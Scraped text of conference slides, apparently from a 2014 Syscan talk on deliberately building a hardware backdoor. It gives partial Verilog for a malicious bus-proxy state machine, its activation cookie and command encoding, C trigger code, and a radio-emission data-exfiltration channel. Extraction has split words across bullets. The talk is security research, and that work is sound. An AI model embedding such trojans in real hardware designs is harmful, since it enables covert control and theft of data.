role of pramana in research.pptx in science
 
NuGOweek 2024 Ghent - programme - final version
NuGOweek 2024 Ghent - programme - final versionNuGOweek 2024 Ghent - programme - final version
NuGOweek 2024 Ghent - programme - final version
 
SCHIZOPHRENIA Disorder/ Brain Disorder.pdf
SCHIZOPHRENIA Disorder/ Brain Disorder.pdfSCHIZOPHRENIA Disorder/ Brain Disorder.pdf
SCHIZOPHRENIA Disorder/ Brain Disorder.pdf
 

Deep submicron-backdoors-ortega-syscan-2014-slides

  • 2. ltration Deep-Submicron Backdoor Syscan Singapore 2014 Alfredo Ortega Groundworks Technologies Deep-Submicron Backdoor
  • 4. ltration Agenda Introduction History Non-gov examples Agenda Deep-Submicron VLSI: Technology smaller than 350nm Hardware Backdoors History Non-Gov examples Unintentional backdoors Why create a CPU backdoor Malproxy BUS backdoor (Demo) RFI Ex
  • 5. ltration backdoor (Demo) Questions Groundworks Technologies Deep-Submicron Backdoor
  • 7. ltration Agenda Introduction History Non-gov examples Introduction Hardware": overused Not Hardware: Regular user-mode backdoors - Re ections on Trusting Trust" Weakening of protocols/cryptography (See RSA Dual EC DRBG saga) Very practical Particularly dangerous Easy to catch Software User−mode Kernel−mode Hypervisor Firmware Microcode Physics Regular Rootkits Hardware Groundworks Technologies Deep-Submicron Backdoor
  • 9. ltration Agenda Introduction History Non-gov examples Hardware" backdoors? Still in software/
  • 10. rmware Specially dangerous if massive (adversary can use them) More expensive to detect (No AVs) Software User−mode Kernel−mode Hypervisor Firmware Microcode Physics Regular Rootkits Bios Rootkits SMM Rootkits AMT Rootkits Hardware Our talk Groundworks Technologies Deep-Submicron Backdoor
  • 12. ltration Agenda Introduction History Non-gov examples History The Great Seal Bug Also called The Thing" one of the
  • 13. rst covert listening devices (Found in 1945) Designed by Leon Theremin Sound-modulated resonant cavity: No external power. Groundworks Technologies Deep-Submicron Backdoor
  • 15. ltration Agenda Introduction History Non-gov examples Clipper chip Clipper chip Developed and promoted by the U.S. NSA Announced in 1993 Skipjack algorithm - Key escrow mechanism Cryptographer Matt Blaze published a serious vulnerability. Entirely defunct by 1996 Groundworks Technologies Deep-Submicron Backdoor
  • 17. ltration Agenda Introduction History Non-gov examples NSA Ant division Catalog NSA ANT Insert catalog Catalog of hardware backdoors Developed from 2005 to 2010 Leaked by Edward Snowden Groundworks Technologies Deep-Submicron Backdoor
  • 19. ltration Agenda Introduction History Non-gov examples Non-gov examples (Legit backdoors) Intel Anti-theft tech Network equipment lawful interception Research and Academia: IEEE Hardware-Oriented Security and Trust (HOST) NYU-Poly Embedded-System Challenge Too many to cite. Very advanced. Stealthy Dopant-Level Hardware Trojans Becker Et. Al. Groundworks Technologies Deep-Submicron Backdoor
  • 21. ltration Agenda Introduction History Non-gov examples Unintentional backdoors World-accesible re ashing mechanisms (BIOS,micro-sd, pendrives, etc.) Most
  • 22. rmware-backdoors Silicon-PROASIC3 backdoor (Skorobogatov Et. Al.) JTAG-interfaces Convenience/Security tradeo Groundworks Technologies Deep-Submicron Backdoor
  • 24. ltration Agenda Introduction History Non-gov examples Rationale No real backdoor on silicon to analyze, all theoretical examples. Let's make a real one. Our approach: Real silicon ASIC design Generic and simple payload trivial to locate. No eort on stealth. Ready for massive deployment Two basic attacks: 1 Bus-intrusion (MALPROXY) 2 data-ex
  • 25. ltration (RiFt) R i Ft MAL PROXY Groundworks Technologies Deep-Submicron Backdoor
  • 27. ltration Introduction High-level design Logic ASIC Usage MALPROXY 3 4 7 1 2 13 12 11 10 9 15 Malicious Bus Proxy RAM BUS CPU 5 6 14 MALPROXY Bus backdoor Small malicious state-machine Peek/Poke functionality AMBA-compatible CPU/Software independent Real system (ARM Cortex-M0 DesignStart) FPGA and silicon-ready Easy to detect Groundworks Technologies Deep-Submicron Backdoor
  • 29. ltration Introduction High-level design Logic ASIC Usage MALPROXY High-level Design Constantly monitoring the AMBA bus. If command correctly parsed, take control of the bus and modify memory. Only two commands needed for execution control: Peek mem32 Poke mem32 If software/arch is known, only Poke command is enough. Search activation cookie Read command Read address Read data Execute command Groundworks Technologies Deep-Submicron Backdoor
  • 31. ltration Introduction High-level design Logic ASIC Usage MALPROXY: Verilog 1 // ------------------------------------------------- 2 // Trivial rootkit coprocessor unit 3 // ------------------------------------------------- 4 reg [5:0] RTKState ; 5 reg [8:0] RTKCmd ; 6 7 reg [3:0] RTKCount ; 8 `define RTK_FIND_START 5'h0 9 `define RTK_FIND_CMD 5'h1 10 `define RTK_FIND_DATA 5'h2 11 `define RTK_FIND_ADDR 5'h3 12 `define RTK_EXEC 5'h4 13 `define RTK_EXEC2 5'h5 14 `define RTK_END 5'h6 15 `define RTK_CMD_WRITE W 16 `define RTK_CMD_READ R 17 18 // 56 - bit initial cookie 19 // I.E. memcpy x78 x56 x34 x12R xaa x55 xaa ; 20 `define RTK_COOKIE_1 32' h12345678 21 `define RTK_COOKIE_2 24' h434241 22 `define RTK_COOKIE_3 24' h2D2D2D // --- 1 always @( posedge HCLK or posedge HRESETn ) 2 begin 3 if (! HRESETn ) // Reset 4 begin 5 RTKState = `RTK_FIND_START ; 6 RTKDeviated =0; 7 end 8 else begin 9 case ( RTKState ) 10 `RTK_FIND_START : // Find first part of cookie 11 if ( HWDATA == `RTK_COOKIE_1 ) 12 begin 13 RTKState = `RTK_FIND_CMD ; 14 end 15 `RTK_FIND_CMD : // Load second part of cookie and 16 begin // single - byte command 17 if ( HWDATA [31:8] == `RTK_COOKIE_2 ) 18 begin 19 RTKCmd = HWDATA [7:0]; 20 RTKState = `RTK_FIND_DATA ; 21 RTKCount =0; 22 end 23 else RTKState = `RTK_FIND_START ; 24 end Groundworks Technologies Deep-Submicron Backdoor
  • 33. ltration Introduction High-level design Logic ASIC Usage MALPROXY: Logic Malproxy 180nm, 100 Mhz: 476 Cells 1.032 mW 0.019 mm2 Total (with Cortex M0): 9526 Cells 14.7 mW 0.38 mm2 Logic diagram (incomplete) Groundworks Technologies Deep-Submicron Backdoor
  • 35. ltration Introduction High-level design Logic ASIC Usage MALPROXY: ASIC Implementation: ARM AMBA-bus compatible 100% Verilog FPGA+ASIC compatible Two process: OSU TSMC 180nm6-layer Nangate 45nm10-layer https://github.com/Groundworkstech/ Submicron (ARM core requires separate license) Placed and Routed, ARM + MalProxy, 180nm 6 metal layers Groundworks Technologies Deep-Submicron Backdoor
  • 37. ltration Introduction High-level design Logic ASIC Usage MALPROXY Demo 1: 45 nm 10-Layer structure Groundworks Technologies Deep-Submicron Backdoor
  • 39. ltration Introduction High-level design Logic ASIC Usage MALPROXY 45-nm 10-layer SOC Encounter Digital ow (Cadence) GDSII output Visible code style dierences Groundworks Technologies Deep-Submicron Backdoor
  • 41. ltration Introduction High-level design Logic ASIC Usage MALPROXY Command encoding: `define RTK_COOKIE_1 32'h12345678 `define RTK_COOKIE_2 24'h434241 `define RTK_COOKIE_3 24'h2D2D2D `define RTK_CMD_WRITE W `define RTK_CMD_READ R ------32 bits ------- - [RTK_COOKIE_1] - [RTK_COOKIE_2 + Command] - [RTK_COOKIE_3 + DATA]*4 - [RTK_COOKIE_3 + ADDR]*4 - [RTK_COOKIE_3 + EXEC] : Executes Command EXEC disconnects the CPU from the BUS and CLK for 2 clocks total. Groundworks Technologies Deep-Submicron Backdoor
  • 43. ltration Introduction High-level design Logic ASIC Usage MALPROXY:Activation Example activation code (*): 1 char buf [40]; 2 char * str= x78 x56 x34 x12WABCA ---A---A---A---x00 ---x00 ---x0a ---x65 ---; 3 while ( TRUE ) { 4 puts ( Main thread : hello world ); 5 memcpy (buf ,str ,40); -- Backdoor activates here 6 chSchDoRescheduleBehind (); 7 } (*) Activation can be triggered by any other means, e.g. network transfer, DMA, etc. Groundworks Technologies Deep-Submicron Backdoor
  • 45. ltration Introduction High-level design Logic ASIC Usage MALPROXY Demo 2: Backdoor activation Groundworks Technologies Deep-Submicron Backdoor
  • 47. ltration Introduction Simulation Measurements End RiFt: Data ex
  • 48. ltration We are not limited by standard communication (TCP/IP, etc) Many side-channels are available. We chose forced RFI using PCB traces Even LED traces can be used Target: Altera DE1 FPGA dev-board Reception with RTL-SDR, up to 5 meters with standard receiver antenna DE1 PCB Groundworks Technologies Deep-Submicron Backdoor
  • 50. ltration Introduction Simulation Measurements End RiFt: Harmonics How it works? CPUs and FPGAs usually can't emit RF directly. They can switch a pin on/o very fast (100 Mhz) This produces a square wave with in
  • 51. nite sinusoidal harmonics We can use any of those harmonic frequencies For now, just simple modulation (AM, on/o) Groundworks Technologies Deep-Submicron Backdoor
  • 53. ltration Introduction Simulation Measurements End RiFt: Harmonics Groundworks Technologies Deep-Submicron Backdoor
  • 55. ltration Introduction Simulation Measurements End RiFt: Simulation Numerical Electromagnetic Codes (xnec2c): Gain vs Freq / 3d Radiation pattern Groundworks Technologies Deep-Submicron Backdoor
  • 57. ltration Introduction Simulation Measurements End RiFt: Simulation Numerical Electromagnetic Codes (xnec2c), data
  • 58. le: CM NEC Input File CM Monopole radius 0.001m, lenght 17m above perfect ground CM Monopole pcb trace 0.0001m, lenght 17m above perfect ground CM Excitation at base by a 1V source CM GW 9 , 8, 0.00000E+00, 0.00000E+00, 0.00000E+00, 0.00000E+00, 0.00800E+00, 0.00000E+00, 1.00000E-03 CM Antenna geometry CE GW 1 , 8, 0.00000E+00, 0.00000E+00, 0.00100E+00, 0.10000E+00, 0.00000E+00, 0.00100E+00, 1.00000E-03 GW 2 , 8, 0.00000E+00, 0.00100E+00, 0.00100E+00, 0.10000E+00, 0.01000E+00, 0.00100E+00, 1.00000E-03 GW 3 , 8, 0.00000E+00, 0.00200E+00, 0.00100E+00, 0.10000E+00, 0.02000E+00, 0.00100E+00, 1.00000E-03 GW 4 , 8, 0.00000E+00, 0.00300E+00, 0.00100E+00, 0.10000E+00, 0.03000E+00, 0.00100E+00, 1.00000E-03 GW 5 , 8, 0.00000E+00, 0.00400E+00, 0.00100E+00, 0.10000E+00, 0.04000E+00, 0.00100E+00, 1.00000E-03 GW 6 , 8, 0.00000E+00, 0.00500E+00, 0.00100E+00, 0.10000E+00, 0.05000E+00, 0.00100E+00, 1.00000E-03 GW 7 , 8, 0.00000E+00, 0.00600E+00, 0.00100E+00, 0.10000E+00, 0.06000E+00, 0.00100E+00, 1.00000E-03 GW 8 , 8, 0.00000E+00, 0.00700E+00, 0.00100E+00, 0.10000E+00, 0.07000E+00, 0.00100E+00, 1.00000E-03 GE FR 0, 1000, 0,0, 100, 1 EX 0 1 1 10 1 RP 0, 19, 36, 1000, 0, 0, 10, 10 EN 0 , 0 , 0 0 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 , 0.00000E+00 Groundworks Technologies Deep-Submicron Backdoor
  • 60. ltration Introduction Simulation Measurements End RiFt: Demo Demo 3: Antenna simulation Groundworks Technologies Deep-Submicron Backdoor
  • 62. ltration Introduction Simulation Measurements End RiFt: Measurements Measurements: Setup Groundworks Technologies Deep-Submicron Backdoor
  • 64. ltration Introduction Simulation Measurements End RiFt: Measurements Measurements results 40 30 20 10 0 10 20 30 40 700 Mhz RiFt power measurement 0 10 20 30 40 40 30 20 10 0 10 20 30 40 dBSM Azimuth - using 1:($3-$2) Groundworks Technologies Deep-Submicron Backdoor
  • 66. ltration Introduction Simulation Measurements End RiFt: Directionality DE1 board LED 1-8 PCB traces at 700 Mhz, order is 1,3,2,4,7,8: Parasitic antenna array showing Yagi-like directionality Groundworks Technologies Deep-Submicron Backdoor
  • 68. ltration Introduction Simulation Measurements End RiFt Demo 4: RiFt in action! Groundworks Technologies Deep-Submicron Backdoor
  • 70. ltration Introduction Simulation Measurements End The end Thanks! Any question? Deep-Submicron Backdoor project was created by researchers Fernando Russ and Alfredo Ortega (Twitter: @ortegaalfredo ) from Groundworks Technologies Buenos Aires, Argentina Groundworks Technologies Deep-Submicron Backdoor